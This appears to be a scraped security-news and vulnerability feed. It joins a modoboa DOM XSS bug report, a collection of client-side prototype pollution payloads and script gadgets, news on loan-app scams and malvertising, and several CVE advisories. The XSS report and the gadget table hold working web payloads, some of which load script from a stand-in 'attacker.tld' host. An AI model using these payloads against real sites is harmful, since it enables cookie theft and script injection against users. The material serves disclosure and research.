Cross-site Scripting (XSS) - DOM in GitHub repository modoboa/modoboa prior to 2.2.2.

Description

I noticed, your website is very secure.

But you overlooked a flaw DOM XSS.

Detail:

1 .Login with demo account.

2 .Go to the link: https://demo.modoboa.org/user/#profile/ and click Update

3 .Use burp to block proxy and inject payload in &language:

     <img+src=0+onerror=alert(document.cookie)>  
    

Proof of Concept

Video Poc

https://drive.google.com/file/d/1DpThlp36jJ7hcjGzehX4wlof3KsPux8O/view?usp=sharing

**Impact**

This security vulnerability has the potential to steal multiple users' cookies, gain unauthorized access to that user's account through stolen cookies, or redirect the user to other malicious websites...

CVE-2023-5688: DOM XSS in https://demo.modoboa.org/user/#profile/ in modoboa

Expand Up

@@ -30,7 +30,7 @@ TwocolsNav.prototype = {

listen: function() {

$("a.ajaxnav").click($.proxy(this.load\_section, this));

$(document).on("click", "#update", $.proxy(function(e) {

var $form \= $("form").first();

var $form \= $(e.target).closest("form");

simple\_ajax\_form\_post(e, {

formid: $form.attr("id"),

modal: false,

Expand Down

CVE-2023-5689: Merge pull request #3095 from modoboa/fix/xss_profile_form · modoboa/modoboa@d33d3cd

By Owais Sultan
As we progress further into digital life, PDF security has evolved increasingly complex.
This is a post from HackRead.com Read the original post: PDF Security – How To Keep Sensitive Data Secure in a PDF File

Dive into PDF security in the digital era and learn how tools like PDF Expert ensure data protection in electronic documents.

At present, in our digital era, protecting confidential data cannot be overstated. With an ever-increasing array of electronic documents like PDFs, protecting sensitive information has become even more critical. This article delves deep into safeguarding PDF files for confidential data — paying special consideration to PDF Expert as a leading tool in this domain.

****Understanding the Importance of PDF Security****

PDF Expert stands out as an industry leader among apps that allow you to edit pdf on iPhone and other Apple devices — offering intuitive PDF editing functions and sophisticated security measures essential for protecting confidential data.

Their universal compatibility across platforms makes PDFs the go-to document option. However, with widespread use comes responsibility in protecting confidential information, including proprietary business data, personal details, or sensitive financial information. This kind of data needs protection from being accessible by third parties.

****Utilize PDF Expert’s Power for Editing PDFs on iPhone & iPad****

PDF Expert has become renowned for its speed, reliability, and user-friendly interface. Not just limited to minor edits, PDF Expert allows users to make major alterations — editing text and adding links, redacting information, altering images, and even electronically signing documents. For business people in particular, quickly signing and sending contracts is often crucial.

****Advanced Security Features for Increased Protection****

*   **Text Recognition:** One of PDF Expert’s most impressive capabilities is Optical Character Recognition (OCR, also known as text recognition). OCR lets users recognize text from scanned documents to make searchable, highlightable, and editable text — something especially helpful when dealing with older PDFs or documents that haven’t yet been digitized.

*   **Enhance Scans:** Scanned documents from years past may not always look their best due to shadows, distortions, and other imperfections in their contents. PDF Expert’s AI-powered enhanced feature rectifies these problems so every PDF looks perfect regardless of where its origination may lie.

*   **Customization and Personalization:** PDF Expert recognizes that every user has individual requirements. Therefore, it offers customizable features that enable users to arrange their most utilized tools according to their workflow; an example of this is using multiple pens for annotations or quickly adding markup tools for fast access. These tools ensure that users can tailor this platform according to their specifications.

****Every Professional Needs the Appropriate Tool****

PDF Expert can meet the needs of educators, students, construction professionals, and managers across various industries.

****Evolution of PDF Security Solutions****

As we progress further into digital life, PDF security has evolved increasingly complex. Gone are the days when simple password protection would suffice — modern threats require advanced solutions like PDF Expert to combat them effectively.

****Encryption Is A First Line Of Defense****

Encryption is one of the cornerstones of PDF security, ensuring data contained within PDF documents remains unreadable to unauthorized users. Only those possessing a valid decryption key (typically a password) may access its contents; PDF Expert employs advanced algorithms for encryption that ensure your documents remain hidden from prying eyes.

****Redaction: Removing Sensitive Data****

At times, certain parts of a document need to be shared while keeping other sections — which contain sensitive data — confidential. With PDF Expert, redacting information is a seamless process that ensures once data has been redacted, it’s gone for good.

****Digital Signatures Provide Authenticity and Integrity Protection****

When PDF Expert is used to sign PDFs digitally, recipients receive assurances that documents have not been modified while also verifying the signer(s) identity.

****Access Control: Directing Who Views What****

PDF Expert’s features allow document creators to set user permissions, enabling you to determine who can view, edit, print, or copy from their PDF document — providing finely controlled access that ensures even though someone might possess your file, they might not necessarily gain full access.

****Keep Current With Threats With Regular Updates: Staying Abreast****

As digital threats emerge regularly, PDF Expert ensures its software is regularly updated with security patches to stay ahead of them and give its customers access to the safest version possible. PDF Expert’s software updates deliver new features and patch potential vulnerabilities for a safer experience. So, users always receive the safest versions possible of its applications.

****PDF Security and Compliance****

Compliance with data protection regulations has become essential across industries. PDF security has to comply with various regulations, ranging from compliance with trading and investment banking regulations to compliance with regulations like Europe’s General Data Protection Regulation (GDPR) and California Consumer Privacy Act (CCPA), which mandate stringent data security measures for many organizations such as trading.

****How PDFs Fit Into Digital Workflows****

PDFs are indispensable in digital collaboration across various spheres — from contract negotiations to research. With increased reliance on PDF documents comes increased responsibility for maintaining their security at every point during their lifespan. PDF Expert’s suite of tools is tailored specifically towards this responsibility, guaranteeing documents remain protected whether in transit, at rest, or actively edited by staff members.

****Education of the Masses: Awareness Is Required****

PDF Expert provides advanced security features, but humans remain an insecure link in any security network. Therefore, users must be educated on the significance of PDF security best practices, including sharing unprotected documents without first understanding the risks involved, regularly updating software applications, and the need for unique passwords when encrypted.

****Future of PDF Security Solutions****

As technology progresses, so will the methods utilized by malicious actors. Artificial Intelligence, Quantum Computing, and other innovative solutions may present new risks to PDF security. However, with continuous innovation and commitment to staying ahead of the curve, tools like PDF Expert are prepared to face these threats head-on and provide robust protection.

****Accept Feedback and Improve continuously****

PDF Expert, as a user-centric tool, regularly solicits feedback from its user community to meet both current needs and anticipate any upcoming challenges and requirements. By regularly soliciting user input through this feedback loop, PDF Expert ensures it remains current while anticipating any foreseeable challenges or needs in its response to users.

****Conclusion****

PDF security in our increasingly digital world cannot be stressed enough. As physical and digital realms continue to merge, software providers and users must prioritize data protection. PDF Expert is leading this charge so we can hope for a future where our digital documents are as safe as their physical equivalents.

****_RELATED ARTICLES_****

1.  Editing Text in a PDF File
2.  Top 7 PDF Tools to Edit, Merge/Split and Protect PDF
3.  MalDoc in PDF Attack: Hackers Hiding Malicious Word Files within PDFs

PDF Security – How To Keep Sensitive Data Secure in a PDF File

The Your Journey theme for WordPress is vulnerable to Reflected Cross-Site Scripting via prototype pollution in versions up to, and including, 1.9.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.

**Client-Side Prototype Pollution****Intro**

If you are unfamiliar with Prototype Pollution Attack, you should read the following first:  
JavaScript prototype pollution attack in NodeJS by Olivier Arteau  
Prototype pollution – and bypassing client-side HTML sanitizers by Michał Bentkowski

In this repository, I am trying to collect examples of libraries that are vulnerable to Prototype Pollution due to document.location parsing and useful script gadgets that can be used to demonstrate the impact.

**Prototype Pollution**

Name

Payload

Refs

Found by

Wistia Embedded Video (**Fixed**)

?__proto__[test]=test  
?__proto__.test=test

\[1\]

William Bowling

jQuery query-object plugin  
CVE-2021-20083

?__proto__[test]=test  
#__proto__[test]=test

Sergey Bobrov

jQuery Sparkle  
CVE-2021-20084

?__proto__.test=test  
?constructor.prototype.test=test

Sergey Bobrov

V4Fire Core Library

?__proto__.test=test  
?__proto__[test]=test  
?__proto__[test]={"json":"value"}

Sergey Bobrov

backbone-query-parameters  
CVE-2021-20085

?__proto__.test=test  
?constructor.prototype.test=test  
?__proto__.array=1|2|3

\[1\]

Sergey Bobrov

jQuery BBQ  
CVE-2021-20086

?__proto__[test]=test  
?constructor[prototype][test]=test

Sergey Bobrov

jquery-deparam  
CVE-2021-20087

?__proto__[test]=test  
?constructor[prototype][test]=test

Sergey Bobrov

MooTools More  
CVE-2021-20088

?__proto__[test]=test  
?constructor[prototype][test]=test

Sergey Bobrov

Swiftype Site Search (**Fixed**)

#__proto__[test]=test

\[1\]

s1r1us

CanJS deparam

?__proto__[test]=test  
?constructor[prototype][test]=test

Rahul Maini

Purl (jQuery-URL-Parser)  
CVE-2021-20089

?__proto__[test]=test  
?constructor[prototype][test]=test  
#__proto__[test]=test

Sergey Bobrov

HubSpot Tracking Code (**Fixed**)

?__proto__[test]=test  
?constructor[prototype][test]=test  
#__proto__[test]=test

Sergey Bobrov

YUI 3 querystring-parse

?constructor[prototype][test]=test

Sergey Bobrov

Mutiny (**Fixed**)

?__proto__.test=test

SPQR

jQuery parseParams

?__proto__.test=test  
?constructor.prototype.test=test

POSIX

php.js parse\_str

?__proto__[test]=test  
?constructor[prototype][test]=test

POSIX

arg.js

?__proto__[test]=test  
?__proto__.test=test  
?constructor[prototype][test]=test  
#__proto__[test]=test

POSIX

davis.js

?__proto__[test]=test

POSIX

Component querystring

?__proto__[NUMBER]=test  
?__proto__[123]=test

Masato Kinugawa

Aurelia path

?__proto__[test]=test

\[1\]

s1r1us

analytics-utils < 1.0.3

?__proto__[test]=test  
?constructor[prototype][test]=test

\[1\]

alexdaviestray

**Script Gadgets**

Name

Payload

Impact

Refs

Found by

Wistia Embedded Video

?__proto__[innerHTML]=<img/src/onerror%3dalert(1)>

XSS

\[1\]

William Bowling

jQuery $.get

?__proto__[context]=<img/src/onerror%3dalert(1)>  
&__proto__[jquery]=x

XSS

Sergey Bobrov

jQuery $.get >= 3.0.0  
Boolean.prototype

?__proto__[url][]=data:,alert(1)//  
&__proto__[dataType]=script

XSS

Michał Bentkowski

jQuery $.get >= 3.0.0  
Boolean.prototype

?__proto__[url]=data:,alert(1)//  
&__proto__[dataType]=script  
&__proto__[crossDomain]=

XSS

Sergey Bobrov

jQuery $.getScript >= 3.4.0

?__proto__[src][]=data:,alert(1)//

XSS

s1r1us

jQuery $.getScript 3.0.0 - 3.3.1  
Boolean.prototype

?__proto__[url]=data:,alert(1)//

XSS

s1r1us

jQuery $(html)

?__proto__[div][0]=1  
&__proto__[div][1]=<img/src/onerror%3dalert(1)>

XSS

Sergey Bobrov

jQuery $(x).off  
String.prototype

?__proto__[preventDefault]=x  
&__proto__[handleObj]=x  
&__proto__[delegateTarget]=<img/src/onerror%3dalert(1)>

XSS

Sergey Bobrov

Google reCAPTCHA

?__proto__[srcdoc][]=<script>alert(1)</script>

XSS

s1r1us

Twitter Universal Website Tag (**Fixed**)

?__proto__[hif][]=javascript:alert(1)

XSS

Sergey Bobrov

Tealium Universal Tag

?__proto__[attrs][src]=1  
&__proto__[src]=data:,alert(1)//

XSS

Sergey Bobrov

Akamai Boomerang

?__proto__[BOOMR]=1  
&__proto__[url]=//attacker.tld/js.js

XSS

s1r1us

Lodash <= 4.17.15

?__proto__[sourceURL]=%E2%80%A8%E2%80%A9alert(1)

XSS

\[1\]

Alex Brasetvik

sanitize-html

?__proto__[*][]=onload

Bypass

\[1\]

Michał Bentkowski

sanitize-html

?__proto__[innerText]=<script>alert(1)</script>

Bypass

\[1\]

Hpdoger

js-xss

?__proto__[whiteList][img][0]=onerror  
&__proto__[whiteList][img][1]=src

Bypass

\[1\]

Michał Bentkowski

DOMPurify <= 2.0.12

?__proto__[ALLOWED_ATTR][0]=onerror  
&__proto__[ALLOWED_ATTR][1]=src

Bypass

\[1\]

Michał Bentkowski

DOMPurify <= 2.0.12

?__proto__[documentMode]=9

Bypass

\[1\]

Michał Bentkowski

Google Closure

?__proto__[*%20ONERROR]=1  
&__proto__[*%20SRC]=1

Bypass

\[1\]

Michał Bentkowski

Google Closure

?__proto__[CLOSURE_BASE_PATH]=data:,alert(1)//

XSS

\[1\]

Michał Bentkowski

Marionette.js / Backbone.js

?__proto__[tagName]=img  
&__proto__[src][]=x:  
&__proto__[onerror][]=alert(1)

XSS

Sergey Bobrov

Adobe Dynamic Tag Management

?__proto__[src]=data:,alert(1)//

XSS

Sergey Bobrov

Adobe Dynamic Tag Management

?__proto__[SRC]=<img/src/onerror%3dalert(1)>

XSS

Sergey Bobrov

Swiftype Site Search

?__proto__[xxx]=alert(1)

XSS

s1r1us

Embedly Cards

?__proto__[onload]=alert(1)

XSS

Guilherme Keerok

Segment Analytics.js

?__proto__[script][0]=1  
&__proto__[script][1]=<img/src/onerror%3dalert(1)>

XSS

Sergey Bobrov

Knockout.js  
Array.prototype

?__proto__[4]=a':1,[alert(1)]:1,'b  
&__proto__[5]=,

XSS

Michał Bentkowski

Zepto.js

?__proto__[onerror]=alert(1)

XSS

\[1\]

lih3iu

Zepto.js

?__proto__[html]=<img/src/onerror%3dalert(1)>

XSS

Sergey Bobrov

Sprint.js

?__proto__[div][intro]=<img%20src%20onerror%3dalert(1)>

XSS

\[1\]

lih3iu

Vue.js

?__proto__[v-if]=_c.constructor('alert(1)')()

XSS

POSIX

Vue.js

?__proto__[attrs][0][name]=src  
&__proto__[attrs][0][value]=xxx  
&__proto__[xxx]=data:,alert(1)//  
&__proto__[is]=script

XSS

\[1\]

s1r1us

Vue.js

?__proto__[v-bind:class]=''.constructor.constructor('alert(1)')()

XSS

\[1\]

r00timentary

Vue.js

?__proto__[data]=a  
&__proto__[template][nodeType]=a  
&__proto__[template][innerHTML]=<script>alert(1)</script>

XSS

\[1\]

SuperGuesser

Vue.js

?__proto__[props][][value]=a  
&__proto__[name]=":''.constructor.constructor('alert(1)')(),"

XSS

\[1\]

st98\_

Vue.js

?__proto__[template]=<script>alert(1)</script>

XSS

\[1\]

huli

Demandbase Tag

?__proto__[Config][SiteOptimization][enabled]=1  
&__proto__[Config][SiteOptimization][recommendationApiURL]=//attacker.tld/json_cors.php?

XSS

SPQR

@analytics/google-tag-manager

?__proto__[customScriptSrc]=//attacker.tld/xss.js

XSS

SPQR

i18next

?__proto__[lng]=cimode  
&__proto__[appendNamespaceToCIMode]=x  
&__proto__[nsSeparator]=<img/src/onerror%3dalert(1)>

Potential XSS

Sergey Bobrov

i18next < 19.8.5

?__proto__[lng]=a  
&__proto__[a]=b  
&__proto__[obj]=c  
&__proto__[k]=d  
&__proto__[d]=<img/src/onerror%3dalert(1)>

Potential XSS

Sergey Bobrov

i18next >= 19.8.5

?__proto__[lng]=a  
&__proto__[key]=<img/src/onerror%3dalert(1)>

Potential XSS

Sergey Bobrov

Google Analytics

?__proto__[cookieName]=COOKIE%3DInjection%3B

Cookie Injection

Sergey Bobrov

Popper.js

?__proto__[arrow][style]=color:red;transition:all%201s  
&__proto__[arrow][ontransitionend]=alert(1)

?__proto__[reference][style]=color:red;transition:all%201s  
&__proto__[reference][ontransitionend]=alert(2)

?__proto__[popper][style]=color:red;transition:all%201s  
&__proto__[popper][ontransitionend]=alert(3)

XSS

\[1\] \[2\]

Matheus Vrech

Pendo Agent

?__proto__[dataHost]=attacker.tld/js.js%23

XSS

Renwa

script.aculo.us  
String.constructor

?x=x  
&x[constructor][__parseStyleElement][innerHTML]=<img/src/onerror%3dalert(1)>

XSS

Sergey Bobrov

hCaptcha (**Fixed**)

?__proto__[assethost]=javascript:alert(1)//

XSS

Masato Kinugawa

Google Closure

?__proto__[trustedTypes]=x  
&__proto__[emptyHTML]=<img/src/onerror%3dalert(1)>

XSS

Mathias Karlsson

Google Tag Manager

?__proto__[vtp_enableRecaptcha]=1  
&__proto__[srcdoc]=<script>alert(1)</script>

XSS

terjanq

Google Tag Manager

?__proto__[q][0][0]=require  
&__proto__[q][0][1]=x  
&__proto__[q][0][2]=https://www.google-analytics.com/gtm/js%3Fid%3DGTM-WXTDWH7

XSS

Sergey Bobrov /  
Masato Kinugawa

Google Analytics

?__proto__[q][0][0]=require  
&__proto__[q][0][1]=x  
&__proto__[q][0][2]=https://www.google-analytics.com/gtm/js%3Fid%3DGTM-WXTDWH7

XSS

Sergey Bobrov /  
Masato Kinugawa

CVE-2023-3933: GitHub - BlackFan/client-side-prototype-pollution: Prototype Pollution and useful Script Gadgets

By Deeba Ahmed
A large number of victims of these scams are unsuspecting users in India.
This is a post from HackRead.com Read the original post: Chinese Scammers Use Fake Loan Apps for Money Laundering

Beware of fake banking and loan apps that offer instant loans but, in reality, collect your Personal Identifying Information (PII) and financial data, while also requesting excessive permissions to access data on your phone.

The cybersecurity researchers at CloudSEK have found a new scam campaign in which Chinese scammers are targeting the Indian digital payment system using illegal instant loan apps. The scammers have lured thousands of victims, making false promises of substantial loans on easy instalments and after obtaining personal details and fees, they vanish. 

The researchers have identified that the reason why law enforcement agencies have been unable to trace their malicious activities is that scammers are using Chinese payment gateways and Indian money mules.

The campaign was discovered between 22nd July and 18th September 2023. The researchers claimed that there have been around 30,000 Adhaar cards and bank accounts have been breached, 40,000 devices compromised, and thousands of users have been tricked.

CloudSEK initiated an investigation on 8 September 2023 after identifying a malicious app advertised by cybercriminals. This app impersonated a well-known bank headquartered in Tamil Naidu, India recording a revenue of $23million. The fake domain name of the C2 server followed this pattern: .online.

Screenshot: CloudSEK

Further probing, according to CloudSEK’s report, revealed a sophisticated scam operation orchestrated by Chinese scammers. So far, scammers have collected more than INR 37 lakhs (equivalent to $46,000) via 55 malicious Android applications. The lure involved offering a loan of 641 crore INR. CloudSEK claims to have identified over 15 obscure payment gateways operated by Chinese scammers.

Their modus operandi relies on false promises in which scammers create fake loan apps and promote them for offering huge loans and flexible repayment packages. Victims are lured into giving away sensitive personal data, including name, phone number, bank account details, and address.

The malicious apps demand excessive permissions, prompting users to grant access to contacts, photos, and other sensitive information. The scammers vanish after extracting their desired information and receiving loan processing fees from the victims, typically 5% of the promised loan amount.

The entire campaign was difficult to track due to its transnational reach. However, it is worth noting that the scam is not confined to India; in fact, scammers are operating a vast network that spans multiple countries, including the following:

*   Brazil
*   Turkey
*   Mexico
*   Vietnam
*   Malaysia
*   Colombia
*   Indonesia
*   Philippines
*   South Africa

Moreover, scammers exploit regulatory gaps such as the UPI service providers (Unified Payments Interface) in India do not come under the PMLA (Prevention of Money Laundering Act) purview, which is a significant loophole that scammers are actively exploiting.

_“_A notable trend we’ve observed is scammers exploiting Chinese payment gateways due to their relative ease of use and limited regulatory scrutiny. These gateways offer a convenient bridge to funnel funds outside India, leveraging sophisticated techniques that blur jurisdictional lines, making it challenging to track and intercept the money trail,_“_ said Sparsh Kulshrestha, Senior Security Analyst at CloudSEK.

_“_This enables scammers to sidestep the legal and financial roadblocks, making it imperative for authorities to enhance cooperation and adopt advanced measures to counter this sophisticated threat,” added Kulshrestha.

The scammers have a robust money mule network where intermediaries receive funds from scammers and transfer them to other accounts for a commission ranging from 1% to 2% of the total transaction amount. Indian bank customers are the primary targets of this campaign. to entice potential money mules, scammers use several different tactics like face-to-face meetings and sponsored travel.

How it is done Screenshot: CloudSEK

An analysis of the fraudulent payment gateways revealed that money is transferred either through online (UPI) or offline (debit card) methods and distributed between multiple recipients. However, fraudsters maintain a presence within India to collect SIM cards and bank accounts for money laundering.

Mitigation efforts involve collaboration between banks and NPCI for enhancing security measures such as the verification of new mobile numbers added to bank accounts. In addition, organizations and regulatory bodies must remain informed about evolving scam tactics and devise reliable fraud detection and prevention measures.

Additionally, it is essential to strengthen UPI security, and service providers must consider additional security measures to protect users. Finally, common sense is your most effective defence against such scams, as the saying goes, “There’s no such thing as a free lunch.” Therefore, don’t anticipate receiving free loans without any consequences.

****_RELATED ARTICLES_****

1.  Hacker Leaks 73M Records from Indian HDFC Bank Subsidiary
2.  Indian Ticketing Platform RailYatri Hacked – 31 Million Impacted
3.  Chinese Spyware on Google Play Store Apps had 2M Downloads
4.  China’s insidious surveillance against Uyghurs with Android malware
5.  Covid antigen test results of 1.7m Indian, foreign nationals leaked online

Chinese Scammers Use Fake Loan Apps for Money Laundering

Red Hat Security Advisory 2023-5931-01 - Updated Satellite 6.13 packages that fixes Important security bugs and several regular bugs are now available for Red Hat Satellite. Issues addressed include code execution and denial of service vulnerabilities.

The following data is constructed from data provided by Red Hat's json file at:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_5931.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Satellite 6.13.5 Async Security Update  
Advisory ID:        RHSA-2023:5931-01  
Product:            Red Hat Satellite 6  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:5931  
Issue date:         2023-10-19  
Revision:           01  
CVE Names:          CVE-2022-1292  
====================================================================

Summary: 

Updated Satellite 6.13 packages that fixes Important security bugs and several regular bugs are now available for Red Hat Satellite.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat Satellite is a system management solution that allows organizations to configure and maintain their systems without the necessity to provide public Internet access to their servers or other client systems. It performs provisioning and configuration management of predefined standard operating environments.

Security fix(es):

* Yggdrasil-worker-forwarder (gRPC): Rapid Reset Attack through HTTP/2 enabled web service which leads to DDoS attack (CVE-2023-44487 & CVE-2023-39325)

A Red Hat Security Bulletin which addresses further details about this flaw is available in the References section.

* Foreman: OS command injection via ct_command and fcct_command (CVE-2022-3874)

* Foreman: Arbitrary code execution through yaml global parameters (CVE-2023-0462)

* GitPython: Remote code execution and improper input validation vulnerability (CVE-2022-24439 & CVE-2023-40267)

* Ruby-git & tfm-rubygem-git: Code injection vulnerability (CVE-2022-47318 & CVE-2022-46648)

* Python-django: Multiple flaws (CVE-2023-31047 & CVE-2023-36053)

* Puppet-agent (openssl): Multiple flaws (CVE-2022-1292 CVE-2022-2068)

This update fixes the following bugs:

2238346 - Red Hat supported provisioning templates are not recognized by RH icon on the row for a given template  
2238348 - when creating a backup on rhel7 and restoring on rhel8, the restore process will fail with permission issues  
2238350 - Virtual machine goes in re-provisioning mode while registration host using Global registration template.  
2238359 - Capsule redundantly synces *-Export-Library repos  
2238361 - Can't update the redhat_repository_url without changing the cdn_configuration to custom_cdn  
2238363 - katello-certs-check does not cause the installer to halt execution on failure  
2238367 - Satellite Web UI >> Hosts >> All Hosts page loading slow even after power isn't selected from the new option \"Manage columns\".  
2238369 - Content-export incremental with syncable format based does not include productid file into repodata directory  
2238371 - SELinux is preventing pulpcore-worker from read access on the key labeled pulpcore_server_t  
2239041 - Reclaim space for repository fails with Cannot delete some instances of model 'Artifact' because they are referenced through protected foreign keys: 'ContentArtifact.artifact'.\"  
2238353 - The \"hammer export\" command using single thread encryption causes a performance bottleneck.  
2240781 - Remediation from CRC via Satellite shows \"Failed\" status even after successful remediation of Insights recommendations.   
2241914 - \"NoMethodError: undefined method `fact_values'\" while trying to perform inventory upload

Users of Red Hat Satellite are advised to upgrade to these updated packages, which fix these bugs.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2022-1292

References:

https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/documentation/en-us/red_hat_satellite/6.13/html/upgrading_and_updating_red_hat_satellite/index  
https://access.redhat.com/security/vulnerabilities/RHSB-2023-003

Red Hat Security Advisory 2023-5931-01

XSS exists in NagVis before 1.9.38 via the select function in share/server/core/functions/html.php.

Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

*   Notifications
*   Fork 71

*   Code
*   Issues 47
*   Pull requests 6
*   Actions
*   Projects
*   Wiki
*   Security
*   Insights

Permalink

_base repository:_ NagVis/nagvis _base:_ nagvis-1.9.37

_head repository:_ NagVis/nagvis _compare:_ nagvis-1.9.38

*   5 commits
*   9 files changed
*   2 contributors

**Commits on Oct 2, 2023**

1.  Browse the repository at this point in the history
    

**Commits on Oct 14, 2023**

1.  Browse the repository at this point in the history
    
2.  Browse the repository at this point in the history
    
3.  Browse the repository at this point in the history
    
4.  Browse the repository at this point in the history

CVE-2023-46287: Comparing nagvis-1.9.37...nagvis-1.9.38 · NagVis/nagvis

Details have emerged about a malvertising campaign that leverages Google Ads to direct users searching for popular software to fictitious landing pages and distribute next-stage payloads.
Malwarebytes, which discovered the activity, said it's "unique in its way to fingerprint users and distribute time sensitive payloads."
The attack singles out users searching for Notepad++ and PDF converters to

Malvertising / Cyber Threat

Details have emerged about a malvertising campaign that leverages Google Ads to direct users searching for popular software to fictitious landing pages and distribute next-stage payloads.

Malwarebytes, which discovered the activity, said it's "unique in its way to fingerprint users and distribute time sensitive payloads."

The attack singles out users searching for Notepad++ and PDF converters to serve bogus ads on the Google search results page that, when clicked, filters out bots and other unintended IP addresses by showing a decoy site.

Should the visitor be deemed of interest to the threat actor, the victim is redirected to a replica website advertising the software, while silently fingerprinting the system to determine if the request is originating from a virtual machine.

Users who fail the check are taken to the legitimate Notepad++ website, while a potential target is assigned a unique ID for "tracking purposes but also to make each download unique and time sensitive."

The final-stage malware is an HTA payload that establishes a connection to a remote domain ("mybigeye\[.\]icu") on a custom port and serves follow-on malware.

"Threat actors are successfully applying evasion techniques that bypass ad verification checks and allow them to target certain types of victims," Jérôme Segura, director of threat intelligence, said.

"With a reliable malware delivery chain in hand, malicious actors can focus on improving their decoy pages and craft custom malware payloads."

The disclosure overlaps with a similar campaign that targets users searching for the KeePass password manager with malicious ads that direct victims to a domain using Punycode (keepass\[.\]info vs ķeepass\[.\]info), a special encoding used to convert Unicode characters to ASCII.

"People who click on the ad will be redirected via a cloaking service that is meant to filter sandboxes, bots and anyone not deemed to be a genuine victim," Segura noted. "The threat actors have set up a temporary domain at keepasstacking\[.\]site that performs the conditional redirect to the final destination."

Users who land on the decoy site are tricked into downloading a malicious installer that ultimately leads to the execution of FakeBat (aka EugenLoader), a loader engineered to download other malicious code.

The abuse of Punycode is not entirely novel, but combining it with rogue Google Ads is a sign that malvertising via search engines is getting more sophisticated. By employing Punycode to register similar domain names as legitimate site, the goal is to pull off a homograph attack and lure victims into installing malware.

"While Punycode with internationalized domain names has been used for years by threat actors to phish victims, it shows how effective it remains in the context of brand impersonation via malvertising," Segura said.

Speaking of visual trickery, multiple threat actors – TA569 (aka SocGholish), RogueRaticate (FakeSG), ZPHP (SmartApeSG), ClearFake, and EtherHiding – have been observed taking advantage of themes related to fake browser updates to propagate Cobalt Strike, loaders, stealers, and remote access trojans, a sign that these attacks are a constant, evolving threat.

"Fake browser updates abuse end user trust with compromised websites and a lure customized to the user's browser to legitimize the update and fool users into clicking," Proofpoint researcher Dusty Miller said in an analysis published this week.

"The threat is only in the browser and can be initiated by a click from a legitimate and expected email, social media site, search engine query, or even just navigating to the compromised site."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Malvertisers Using Google Ads to Target Users Searching for Popular Software

An issue in Fnando svg_optimizer v.0.2.6 allows a remote attacker to escalate privileges when optimizing untrusted SVG content.


**svg\_optimizer rubygem external XML entity (XXE) vulnerability**

Moderate severity GitHub Reviewed Published Oct 20, 2023 to the GitHub Advisory Database • Updated Oct 20, 2023

GHSA-6hvg-62q8-95v7: svg_optimizer rubygem external XML entity (XXE) vulnerability

All versions of Apache Santuario - XML Security for Java prior to 2.2.6, 2.3.4, and 3.0.3, when using the JSR 105 API, are vulnerable to an issue where a private key may be disclosed in log files when generating an XML Signature and logging with debug level is enabled. Users are recommended to upgrade to version 2.2.6, 2.3.4, or 3.0.3, which fixes this issue.


Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2023-44483

**Apache Santuario - XML Security for Java are vulnerable to private key disclosure**

Moderate severity GitHub Reviewed Published Oct 20, 2023 to the GitHub Advisory Database • Updated Oct 20, 2023

**Package**

maven org.apache.santuario:xmlsec (Maven)

**Affected versions**

\>= 2.3.0, < 2.3.4

< 2.2.6

\>= 3.0.0, < 3.0.3

**Patched versions**

2.3.4

2.2.6

3.0.3

**Description**

Published to the GitHub Advisory Database

Oct 20, 2023

Last updated

Oct 20, 2023

Tag

#git